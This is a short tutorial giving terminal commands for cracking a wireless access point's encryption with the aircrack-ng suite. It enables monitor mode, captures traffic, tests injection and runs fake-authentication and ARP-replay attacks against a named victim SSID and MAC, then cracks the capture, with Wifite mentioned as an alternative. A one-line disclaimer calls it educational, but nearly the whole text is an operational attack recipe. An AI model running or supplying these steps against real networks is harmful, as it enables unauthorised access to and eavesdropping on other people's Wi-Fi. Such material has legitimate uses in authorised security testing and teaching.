NOTE: The instructions below are for concept learning and education purposes only. It
is illegal to hack an access point without the owner’s consent.
PHASE 1 – Monitor Mode
OPEN A TERMINAL WINDOW (Terminal 1)
1. Set your wireless interface to monitor mode.
airmon-ng start [interface]
2. Start monitoring the wireless traffic, and save it to a file.
airodump-ng -w [filename] [interface]
PHASE 2 – Generate IVs
OPEN A SECOND TERMINAL WINDOW (Terminal 2)
1. Generate IVs (Initialization Vectors) by using “aireplay-ng”.
Type: aireplay-ng --help to see the syntax and switches.
2. Test the target’s ability to accept packet injection, type:
aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]
- The ideal outcome is a 100% injection result.
3. List the aireplay-ng help to view the attack modes available. Be patient and creative. Here are some examples:
Fake Authentication with target AP
Ex.1 - aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface]
Ex.2 - aireplay-ng -1 6000 -o 1 -q 10 -e [vic ssid] -a [vic mac] -h [your mac] [interface]
Standard ARP-request replay
aireplay-ng -3 -b [vic mac] -h [your mac] [interface]
PHASE 3 – Cracking
OPEN A THIRD TERMINAL WINDOW (Terminal 3)
1. Start cracking, type:
aircrack-ng [filename]
- [filename] is the location and name of the file you are dumping from Terminal 1.
2. Pick the target SSID to start cracking.
OR use WIFITE